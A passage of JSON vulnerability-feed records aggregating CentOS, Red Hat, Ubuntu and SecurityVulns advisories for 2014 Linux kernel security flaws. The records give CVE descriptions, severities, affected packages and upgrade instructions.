(rd_mcp)\nback end driver of the iSCSI Target subsystem could allow a privileged user\nto leak the contents of kernel memory to an iSCSI initiator remote client.\n(CVE-2014-4027, Low)\n\n* An information leak flaw in the Linux kernel's ALSA implementation could\nallow a local, privileged user to leak kernel memory to user space.\n(CVE-2014-4652, Low)\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-December/032858.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1971.html", "edition": 3, "modified": "2014-12-10T12:48:13", "published": "2014-12-10T12:48:13", "href": "http://lists.centos.org/pipermail/centos-announce/2014-December/032858.html", "id": "CESA-2014:1971", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T18:26:15", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3673", "CVE-2014-3688", "CVE-2014-9322", "CVE-2014-5472", "CVE-2012-6657", "CVE-2014-6410", "CVE-2014-5471", "CVE-2014-3687"], "description": "**CentOS Errata and Security Advisory** CESA-2014:1997\n\n\n* A flaw was found in the way the Linux kernel handled GS segment register\nbase switching when recovering from a #SS (stack segment) fault on an\nerroneous return to user space. A local, unprivileged user could use this\nflaw to escalate their privileges on the system. (CVE-2014-9322, Important)\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled malformed or duplicate Address Configuration Change Chunks\n(ASCONF). A remote attacker could use either of these flaws to crash the\nsystem. (CVE-2014-3673, CVE-2014-3687, Important)\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled the association's output queue. A remote attacker could send\nspecially crafted packets that would cause the system to use an excessive\namount of memory, leading to a denial of service. (CVE-2014-3688,\nImportant)\n\n* A stack overflow flaw caused by infinite recursion was found in the way\nthe Linux kernel's UDF file system implementation processed indirect ICBs.\nAn attacker with physical access to the system could use a specially\ncrafted UDF image to crash the system. (CVE-2014-6410, Low)\n\n* It was found that the Linux kernel's networking implementation did not\ncorrectly handle the setting of the keepalive socket option on raw sockets.\nA local user able to create a raw socket could use this flaw to crash the\nsystem. (CVE-2012-6657, Low)\n\n* It was found that the parse_rock_ridge_inode_internal() function of the\nLinux kernel's ISOFS implementation did not correctly check relocated\ndirectories when processing Rock Ridge child link (CL) tags. An attacker\nwith physical access to the system could use a specially crafted ISO image\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2014-5471, CVE-2014-5472, Low)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-9322.\nThe CVE-2014-3673 issue was discovered by Liu Wei of Red Hat.\n\nBug fixes:\n\n* This update fixes a race condition issue between the sock_queue_err_skb\nfunction and sk_forward_alloc handling in the socket error queue\n(MSG_ERRQUEUE), which could occasionally cause the kernel, for example when\nusing PTP, to incorrectly track allocated memory for the error queue, in\nwhich case a traceback would occur in the system log. (BZ#1155427)\n\n* The zcrypt device driver did not detect certain crypto cards and the\nrelated domains for crypto adapters on System z and s390x architectures.\nConsequently, it was not possible to run the system on new crypto hardware.\nThis update enables toleration mode for such devices so that the system\ncan make use of newer crypto hardware. (BZ#1158311)\n\n* After mounting and unmounting an XFS file system several times\nconsecutively, the umount command occasionally became unresponsive.\nThis was caused by the xlog_cil_force_lsn() function that was not waiting\nfor completion as expected. With this update, xlog_cil_force_lsn() has been\nmodified to correctly wait for completion, thus fixing this bug.\n(BZ#1158325)\n\n* When using the ixgbe adapter with disabled LRO and the tx-usec or rs-usec\nvariables set to 0, transmit interrupts could not be set lower than the\ndefault of 8 buffered tx frames. Consequently, a delay of TCP transfer\noccurred. The restriction of a minimum of 8 buffered frames has been\nremoved, and the TCP delay no longer occurs. (BZ#1158326)\n\n* The offb driver has been updated for the QEMU standard VGA adapter,\nfixing an incorrect displaying of colors issue. (BZ#1158328)\n\n* Under certain circumstances, when a discovered MTU expired, the IPv6\nconnection became unavailable for a short period of time. This bug has been\nfixed, and the connection now works as expected. (BZ#1161418)\n\n* A low throughput occurred when using the dm-thin driver to write to\nunprovisioned or shared chunks for a thin pool with the chunk size bigger\nthan the max_sectors_kb variable. (BZ#1161420)\n\n* Large write workloads on thin LVs could cause the iozone and smallfile\nutilities to terminate unexpectedly. (BZ#1161421)\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-December/032876.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1997.html", "edition": 3, "modified": "2014-12-17T12:13:22", "published": "2014-12-17T12:13:22", "href": "http://lists.centos.org/pipermail/centos-announce/2014-December/032876.html", "id": "CESA-2014:1997", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T18:25:24", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7841", "CVE-2014-4656"], "description": "**CentOS Errata and Security Advisory** CESA-2015:0087\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nvalidated INIT chunks when performing Address Configuration Change\n(ASCONF). A remote attacker could use this flaw to crash the system by\nsending a specially crafted SCTP packet to trigger a NULL pointer\ndereference on the system. (CVE-2014-7841, Important)\n\n* An integer overflow flaw was found in the way the Linux kernel's Advanced\nLinux Sound Architecture (ALSA) implementation handled user controls.\nA local, privileged user could use this flaw to crash the system.\n(CVE-2014-4656, Moderate)\n\nThe CVE-2014-7841 issue was discovered by Liu Wei of Red Hat.\n\nThis update also fixes several bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-January/032948.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0087.html", "edition": 3, "modified": "2015-01-28T22:43:51", "published": "2015-01-28T22:43:51", "href": "http://lists.centos.org/pipermail/centos-announce/2015-January/032948.html", "id": "CESA-2015:0087", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:15", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2929", "CVE-2014-1739", "CVE-2014-3181", "CVE-2014-3182", "CVE-2014-3184", "CVE-2014-3185", "CVE-2014-3186", "CVE-2014-3631", "CVE-2014-3673", "CVE-2014-3687", "CVE-2014-3688", "CVE-2014-4027", "CVE-2014-4652", "CVE-2014-4654", "CVE-2014-4655", "CVE-2014-4656", "CVE-2014-5045", "CVE-2014-6410"], "description": "* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled malformed or duplicate Address Configuration Change Chunks\n(ASCONF). A remote attacker could use either of these flaws to crash the\nsystem. (CVE-2014-3673, CVE-2014-3687, Important)\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled the association's output queue. A remote attacker could send\nspecially crafted packets that would cause the system to use an excessive\namount of memory, leading to a denial of service. (CVE-2014-3688,\nImportant)\n\n* Two flaws were found in the way the Apple Magic Mouse/Trackpad\nmulti-touch driver and the Minibox PicoLCD driver handled invalid HID\nreports. An attacker with physical access to the system could use these\nflaws to crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2014-3181, CVE-2014-3186, Moderate)\n\n* A memory corruption flaw was found in the way the USB ConnectTech\nWhiteHEAT serial driver processed completion commands sent via USB Request\nBlocks buffers. An attacker with physical access to the system could use\nthis flaw to crash the system or, potentially, escalate their privileges on\nthe system. (CVE-2014-3185, Moderate)\n\n* A flaw was found in the way the Linux kernel's keys subsystem handled the\ntermination condition in the associative array garbage collection\nfunctionality. A local, unprivileged user could use this flaw to crash the\nsystem. (CVE-2014-3631, Moderate)\n\n* Multiple flaws were found in the way the Linux kernel's ALSA\nimplementation handled user controls. A local, privileged user could use\neither of these flaws to crash the system. (CVE-2014-4654, CVE-2014-4655,\nCVE-2014-4656, Moderate)\n\n* A flaw was found in the way the Linux kernel's VFS subsystem handled\nreference counting when performing unmount operations on symbolic links.\nA local, unprivileged user could use this flaw to exhaust all available\nmemory on the system or, potentially, trigger a use-after-free error,\nresulting in a system crash or privilege escalation. (CVE-2014-5045,\nModerate)\n\n* A flaw was found in the way the get_dumpable() function return value was\ninterpreted in the ptrace subsystem of the Linux kernel. When\n'fs.suid_dumpable' was set to 2, a local, unprivileged local user could\nuse this flaw to bypass intended ptrace restrictions and obtain\npotentially sensitive information. (CVE-2013-2929, Low)\n\n* A stack overflow flaw caused by infinite recursion was found in the way\nthe Linux kernel's UDF file system implementation processed indirect ICBs.\nAn attacker with physical access to the system could use a specially\ncrafted UDF image to crash the system. (CVE-2014-6410, Low)\n\n* An information leak flaw in the way the Linux kernel handled media device\nenumerate entities IOCTL requests could allow a local user able to access\nthe /dev/media0 device file to leak kernel memory bytes. (CVE-2014-1739,\nLow)\n\n* An out-of-bounds read flaw in the Logitech Unifying receiver driver could\nallow an attacker with physical access to the system to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2014-3182,\nLow)\n\n* Multiple out-of-bounds write flaws were found in the way the Cherry\nCymotion keyboard driver, KYE/Genius device drivers, Logitech device\ndrivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote\ncontrol driver, and Sunplus wireless desktop driver handled invalid HID\nreports. An attacker with physical access to the system could use either of\nthese flaws to write data past an allocated memory buffer. (CVE-2014-3184,\nLow)\n\n* An information leak flaw was found in the RAM Disks Memory Copy (rd_mcp)\nback end driver of the iSCSI Target subsystem could allow a privileged user\nto leak the contents of kernel memory to an iSCSI initiator remote client.\n(CVE-2014-4027, Low)\n\n* An information leak flaw in the Linux kernel's ALSA implementation could\nallow a local, privileged user to leak kernel memory to user space.\n(CVE-2014-4652, Low)\n", "modified": "2018-04-12T03:32:37", "published": "2014-12-09T05:00:00", "id": "RHSA-2014:1971", "href": "https://access.redhat.com/errata/RHSA-2014:1971", "type": "redhat", "title": "(RHSA-2014:1971) Important: kernel security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-08-14T12:05:24", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4652", "CVE-2014-4653", "CVE-2014-4654", "CVE-2014-4655", "CVE-2014-4656", "CVE-2014-5077"], "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A NULL pointer dereference flaw was found in the way the Linux kernel's\nStream Control Transmission Protocol (SCTP) implementation handled\nsimultaneous connections between the same hosts. A remote attacker could\nuse this flaw to crash the system. (CVE-2014-5077, Important)\n\n* Multiple use-after-free flaws and an integer overflow flaw were found in\nthe way the Linux kernel's Advanced Linux Sound Architecture (ALSA)\nimplementation handled user controls. A local, privileged user could use\neither of these flaws to crash the system. (CVE-2014-4653, CVE-2014-4654,\nCVE-2014-4655, CVE-2014-4656, Moderate)\n\n* An information leak flaw was found in the way the Linux kernel's Advanced\nLinux Sound Architecture (ALSA) implementation handled access of the user\ncontrol's state. A local, privileged user could use this flaw to leak\nkernel memory to user space. (CVE-2014-4652, Low)\n\nThis update also fixes the following bug:\n\n* Prior to this update, the netconsole module was unavailable on MRG\nRealtime kernels due to locking issues that disabled it. These locking\nissues have been corrected, allowing the netconsole module to be re-enabled\nand functional on Realtime kernels. (BZ#1088923)\n\nUsers are advised to upgrade to these updated packages, which upgrade the\nkernel-rt kernel to version kernel-rt-3.10.33-rt32.45 and correct these\nissues. The system must be rebooted for this update to take effect.\n", "modified": "2018-06-07T08:58:29", "published": "2014-08-20T04:00:00", "id": "RHSA-2014:1083", "href": "https://access.redhat.com/errata/RHSA-2014:1083", "type": "redhat", "title": "(RHSA-2014:1083) Important: kernel-rt security and bug fix update", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:46:05", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6657", "CVE-2014-3673", "CVE-2014-3687", "CVE-2014-3688", "CVE-2014-5471", "CVE-2014-5472", "CVE-2014-6410", "CVE-2014-9322"], "description": "* A flaw was found in the way the Linux kernel handled GS segment register\nbase switching when recovering from a #SS (stack segment) fault on an\nerroneous return to user space. A local, unprivileged user could use this\nflaw to escalate their privileges on the system. (CVE-2014-9322, Important)\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled malformed or duplicate Address Configuration Change Chunks\n(ASCONF). A remote attacker could use either of these flaws to crash the\nsystem. (CVE-2014-3673, CVE-2014-3687, Important)\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled the association's output queue. A remote attacker could send\nspecially crafted packets that would cause the system to use an excessive\namount of memory, leading to a denial of service. (CVE-2014-3688,\nImportant)\n\n* A stack overflow flaw caused by infinite recursion was found in the way\nthe Linux kernel's UDF file system implementation processed indirect ICBs.\nAn attacker with physical access to the system could use a specially\ncrafted UDF image to crash the system. (CVE-2014-6410, Low)\n\n* It was found that the Linux kernel's networking implementation did not\ncorrectly handle the setting of the keepalive socket option on raw sockets.\nA local user able to create a raw socket could use this flaw to crash the\nsystem. (CVE-2012-6657, Low)\n\n* It was found that the parse_rock_ridge_inode_internal() function of the\nLinux kernel's ISOFS implementation did not correctly check relocated\ndirectories when processing Rock Ridge child link (CL) tags. An attacker\nwith physical access to the system could use a specially crafted ISO image\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2014-5471, CVE-2014-5472, Low)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-9322.\nThe CVE-2014-3673 issue was discovered by Liu Wei of Red Hat.\n\nBug fixes:\n\n* This update fixes a race condition issue between the sock_queue_err_skb\nfunction and sk_forward_alloc handling in the socket error queue\n(MSG_ERRQUEUE), which could occasionally cause the kernel, for example when\nusing PTP, to incorrectly track allocated memory for the error queue, in\nwhich case a traceback would occur in the system log. (BZ#1155427)\n\n* The zcrypt device driver did not detect certain crypto cards and the\nrelated domains for crypto adapters on System z and s390x architectures.\nConsequently, it was not possible to run the system on new crypto hardware.\nThis update enables toleration mode for such devices so that the system\ncan make use of newer crypto hardware. (BZ#1158311)\n\n* After mounting and unmounting an XFS file system several times\nconsecutively, the umount command occasionally became unresponsive.\nThis was caused by the xlog_cil_force_lsn() function that was not waiting\nfor completion as expected. With this update, xlog_cil_force_lsn() has been\nmodified to correctly wait for completion, thus fixing this bug.\n(BZ#1158325)\n\n* When using the ixgbe adapter with disabled LRO and the tx-usec or rs-usec\nvariables set to 0, transmit interrupts could not be set lower than the\ndefault of 8 buffered tx frames. Consequently, a delay of TCP transfer\noccurred. The restriction of a minimum of 8 buffered frames has been\nremoved, and the TCP delay no longer occurs. (BZ#1158326)\n\n* The offb driver has been updated for the QEMU standard VGA adapter,\nfixing an incorrect displaying of colors issue. (BZ#1158328)\n\n* Under certain circumstances, when a discovered MTU expired, the IPv6\nconnection became unavailable for a short period of time. This bug has been\nfixed, and the connection now works as expected. (BZ#1161418)\n\n* A low throughput occurred when using the dm-thin driver to write to\nunprovisioned or shared chunks for a thin pool with the chunk size bigger\nthan the max_sectors_kb variable. (BZ#1161420)\n\n* Large write workloads on thin LVs could cause the iozone and smallfile\nutilities to terminate unexpectedly. (BZ#1161421)\n", "modified": "2018-06-06T20:24:06", "published": "2014-12-16T05:00:00", "id": "RHSA-2014:1997", "href": "https://access.redhat.com/errata/RHSA-2014:1997", "type": "redhat", "title": "(RHSA-2014:1997) Important: kernel security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:44:41", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3181", "CVE-2014-3182", "CVE-2014-3184", "CVE-2014-3185", "CVE-2014-4171", "CVE-2014-5471", "CVE-2014-5472", "CVE-2014-6410"], "description": "Red Hat Enterprise MRG (Messaging, Realtime, and Grid) is a next-generation\nIT infrastructure for enterprise computing. MRG offers increased\nperformance, reliability, interoperability, and faster computing for\nenterprise customers.\n\nMRG Realtime provides the highest levels of predictability for consistent\nlow-latency response times to meet the needs of time-sensitive workloads.\nMRG Realtime also provides new levels of determinism by optimizing lengthy\nkernel code paths to ensure that they do not become bottlenecks. This\nallows for better prioritization of applications, resulting in consistent,\npredictable response times for high-priority applications.\n\n* An out-of-bounds write flaw was found in the way the Apple Magic\nMouse/Trackpad multi-touch driver handled Human Interface Device (HID)\nreports with an invalid size. An attacker with physical access to the\nsystem could use this flaw to crash the system or, potentially, escalate\ntheir privileges on the system. (CVE-2014-3181, Moderate)\n\n* A memory corruption flaw was found in the way the USB ConnectTech\nWhiteHEAT serial driver processed completion commands sent via USB Request\nBlocks buffers. An attacker with physical access to the system could use\nthis flaw to crash the system or, potentially, escalate their privileges on\nthe system. (CVE-2014-3185, Moderate)\n\n* A race condition flaw was found in the way the Linux kernel's mmap(2),\nmadvise(2), and fallocate(2) system calls interacted with each other while\noperating on virtual memory file system files. A local user could use this\nflaw to cause a denial of service. (CVE-2014-4171, Moderate)\n\n* A stack overflow flaw caused by infinite recursion was found in the way\nthe Linux kernel's Universal Disk Format (UDF) file system implementation\nprocessed indirect Information Control Blocks (ICBs). An attacker with\nphysical access to the system could use a specially crafted UDF image to\ncrash the system. (CVE-2014-6410, Low)\n\n* An out-of-bounds read flaw was found in the way the Logitech Unifying\nreceiver driver handled HID reports with an invalid device_index value.\nAn attacker with physical access to the system could use this flaw to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-3182, Low)\n\n* Multiple out-of-bounds write flaws were found in the way the Cherry\nCymotion keyboard driver, KYE/Genius device drivers, Logitech device\ndrivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote\ncontrol driver, and Sunplus wireless desktop driver handled HID reports\nwith an invalid report descriptor size. An attacker with physical access to\nthe system could use either of these flaws to write data past an allocated\nmemory buffer. (CVE-2014-3184, Low)\n\n* It was found that the parse_rock_ridge_inode_internal() function of the\nLinux kernel's ISOFS implementation did not correctly check relocated\ndirectories when processing Rock Ridge child link (CL) tags. An attacker\nwith physical access to the system could use a specially crafted ISO image\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2014-5471, CVE-2014-5472, Low)\n\nThis update also adds the following enhancement:\n\n* The Solarflare SFC9120 10GBE Ethernet NICs were not supported by the MRG\nRealtime kernel. With this update, the drivers have been updated to enable\nthe Solarflare SFC9120 cards on the Realtime kernel. (BZ#1086945)\n\nAll Red Hat Enterprise MRG Realtime users are advised to upgrade to these\nupdated packages, which contain backported patches to correct these issues\nand add this enhancement.\n", "modified": "2018-06-07T08:58:25", "published": "2014-09-29T04:00:00", "id": "RHSA-2014:1318", "href": "https://access.redhat.com/errata/RHSA-2014:1318", "type": "redhat", "title": "(RHSA-2014:1318) Moderate: Red Hat Enterprise MRG Realtime 2.5 security and enhancement update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:15", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4656", "CVE-2014-7841"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nvalidated INIT chunks when performing Address Configuration Change\n(ASCONF). A remote attacker could use this flaw to crash the system by\nsending a specially crafted SCTP packet to trigger a NULL pointer\ndereference on the system. (CVE-2014-7841, Important)\n\n* An integer overflow flaw was found in the way the Linux kernel's Advanced\nLinux Sound Architecture (ALSA) implementation handled user controls.\nA local, privileged user could use this flaw to crash the system.\n(CVE-2014-4656, Moderate)\n\nThe CVE-2014-7841 issue was discovered by Liu Wei of Red Hat.\n\nThis update also fixes several bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.", "modified": "2018-06-06T20:24:15", "published": "2015-01-27T23:35:24", "id": "RHSA-2015:0087", "href": "https://access.redhat.com/errata/RHSA-2015:0087", "type": "redhat", "title": "(RHSA-2015:0087) Important: kernel security and bug fix update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-1739"], "description": "\r\n\r\nHi,\r\n\r\nWe found an infoleak vulnerability in the ioctl media_enum_entities()\r\nthat allows to disclose 200 bytes the kernel process' stack.\r\nThe vulnerability is exploitable on versions up to linux-3.15-rc3 by\r\nlocal users with read access to `/dev/media0`.\r\nLinux distributions ship with `chmod 600 /dev/media0` preventing\r\nunprivileged local users from exploiting the vulnerability.\r\nHowever, some Android devices are known to be shipped with both read\r\nand/or write permissions for all: chmod 666 /dev/media0.\r\n\r\nA detailed analysis, proof of concept and fixes are at:\r\nhttp://speirofr.appspot.com/cve-2014-1739-kernel-infoleak-vulnerability-in-media_enum_entities.html\r\n\r\nThis has been fixed in Linux Kernel commit:\r\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e6a623460e5fc960ac3ee9f946d3106233fd28d8\r\n\r\ne6a623460e5fc960ac3ee9f946d3106233fd28d8\r\nAuthor\tSalva Peiro <speiro@ai2.upv.es>\r\nDate Thu, 1 May 2014 12:53:28 +0000\r\nCommit [media] media-device: fix infoleak in ioctl media_enum_entities()\r\n\r\n This fixes CVE-2014-1739.\r\n\r\n Signed-off-by: Salva Peiro <speiro@ai2.upv.es>\r\n Acked-by: Laurent Pinchart <laurent.pinchart@ideasonboard.com>\r\n Cc: stable@vger.kernel.org\r\n Signed-off-by: Mauro Carvalho Chehab <m.chehab@samsung.com>\r\n\r\nSalva Peiro\r\n\r\n", "edition": 1, "modified": "2014-06-17T00:00:00", "published": "2014-06-17T00:00:00", "id": "SECURITYVULNS:DOC:30880", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30880", "title": "[oss-security] CVE-2014-1739: Kernel Infoleak vulnerability in,media_enum_entities()", "type": "securityvulns", "cvss": {"score": 1.7, "vector": "AV:LOCAL/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-3186", "CVE-2014-6417", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-6416", "CVE-2014-3631", "CVE-2014-6418", "CVE-2014-6410", "CVE-2014-3184"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2379-1\r\nOctober 09, 2014\r\n\r\nlinux vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 14.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in the kernel.\r\n\r\nSoftware Description:\r\n- linux: Linux kernel\r\n\r\nDetails:\r\n\r\nSteven Vittitoe reported multiple stack buffer overflows in Linux kernel's\r\nmagicmouse HID driver. A physically proximate attacker could exploit this\r\nflaw to cause a denial of service (system crash) or possibly execute\r\narbitrary code via specially crafted devices. (CVE-2014-3181)\r\n\r\nBen Hawkes reported some off by one errors for report descriptors in the\r\nLinux kernel's HID stack. A physically proximate attacker could exploit\r\nthese flaws to cause a denial of service (out-of-bounds write) via a\r\nspecially crafted device. (CVE-2014-3184)\r\n\r\nSeveral bounds check flaws allowing for buffer overflows were discovered in\r\nthe Linux kernel's Whiteheat USB serial driver. A physically proximate\r\nattacker could exploit these flaws to cause a denial of service (system\r\ncrash) via a specially crafted device. (CVE-2014-3185)\r\n\r\nSteven Vittitoe reported a buffer overflow in the Linux kernel's PicoLCD\r\nHID device driver. A physically proximate attacker could exploit this flaw\r\nto cause a denial of service (system crash) or possibly execute arbitrary\r\ncode via a specially craft device. (CVE-2014-3186)\r\n\r\nA flaw was discovered in the Linux kernel's associative-array garbage\r\ncollection implementation. A local user could exploit this flaw to cause a\r\ndenial of service (system crash) or possibly have other unspecified impact\r\nby using keyctl operations. (CVE-2014-3631)\r\n\r\nA flaw was discovered in the Linux kernel's UDF filesystem (used on some\r\nCD-ROMs and DVDs) when processing indirect ICBs. An attacker who can cause\r\nCD, DVD or image file with a specially crafted inode to be mounted can\r\ncause a denial of service (infinite loop or stack consumption).\r\n(CVE-2014-6410)\r\n\r\nJames Eckersall discovered a buffer overflow in the Ceph filesystem in the\r\nLinux kernel. A remote attacker could exploit this flaw to cause a denial\r\nof service (memory consumption and panic) or possibly have other\r\nunspecified impact via a long unencrypted auth ticket. (CVE-2014-6416)\r\n\r\nJames Eckersall discovered a flaw in the handling of memory allocation\r\nfailures in the Ceph filesystem. A remote attacker could exploit this flaw\r\nto cause a denial of service (system crash) or possibly have unspecified\r\nother impact. (CVE-2014-6417)\r\n\r\nJames Eckersall discovered a flaw in how the Ceph filesystem validates auth\r\nreplies. A remote attacker could exploit this flaw to cause a denial of\r\nservice (system crash) or possibly have other unspecified impact.\r\n(CVE-2014-6418)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 14.04 LTS:\r\n linux-image-3.13.0-37-generic 3.13.0-37.64\r\n linux-image-3.13.0-37-generic-lpae 3.13.0-37.64\r\n linux-image-3.13.0-37-lowlatency 3.13.0-37.64\r\n linux-image-3.13.0-37-powerpc-e500 3.13.0-37.64\r\n linux-image-3.13.0-37-powerpc-e500mc 3.13.0-37.64\r\n linux-image-3.13.0-37-powerpc-smp 3.13.0-37.64\r\n linux-image-3.13.0-37-powerpc64-emb 3.13.0-37.64\r\n linux-image-3.13.0-37-powerpc64-smp 3.13.0-37.64\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nATTENTION: Due to an unavoidable ABI change the kernel updates have\r\nbeen given a new version number, which requires you to recompile and\r\nreinstall all third party kernel modules you might have installed. If\r\nyou use linux-restricted-modules, you have to update that package as\r\nwell to get modules which work with the new kernel version. Unless you\r\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\r\nlinux-server, linux-powerpc), a standard system upgrade will automatically\r\nperform this as well.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2379-1\r\n CVE-2014-3181, CVE-2014-3184, CVE-2014-3185, CVE-2014-3186,\r\n CVE-2014-3631, CVE-2014-6410, CVE-2014-6416, CVE-2014-6417,\r\n CVE-2014-6418\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux/3.13.0-37.64\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2014-10-11T00:00:00", "published": "2014-10-11T00:00:00", "id": "SECURITYVULNS:DOC:31142", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31142", "title": "[USN-2379-1] Linux kernel vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:57", "bulletinFamily": "software", "cvelist": ["CVE-2014-3186", "CVE-2014-6417", "CVE-2014-3181", "CVE-2014-7975", "CVE-2014-3185", "CVE-2014-6416", "CVE-2014-3631", "CVE-2014-6418", "CVE-2014-6410", "CVE-2014-3184"], "description": "DoS conditions and buffer overflows in multiple drivers, multiple Ceph network file system vulnerabilities.", "edition": 1, "modified": "2014-10-27T00:00:00", "published": "2014-10-27T00:00:00", "id": "SECURITYVULNS:VULN:13997", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13997", "title": "Linux kernel multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-3940", "CVE-2014-0131", "CVE-2014-4157", "CVE-2014-1739", "CVE-2014-4508", "CVE-2014-4943", "CVE-2014-0206", "CVE-2014-4171", "CVE-2014-4014", "CVE-2014-4027", "CVE-2014-4608", "CVE-2014-4611", "CVE-2014-4652", "CVE-2014-4667"], "description": "Kernel memory content leak via media_enum_entities() and rd_mcp() IOCTL, DoS, privilege escalations.", "edition": 1, "modified": "2014-07-21T00:00:00", "published": "2014-07-21T00:00:00", "id": "SECURITYVULNS:VULN:13844", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13844", "title": "Linux kernel multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:55", "bulletinFamily": "software", "cvelist": ["CVE-2014-3122", "CVE-2014-5077", "CVE-2014-3182", "CVE-2014-3186", 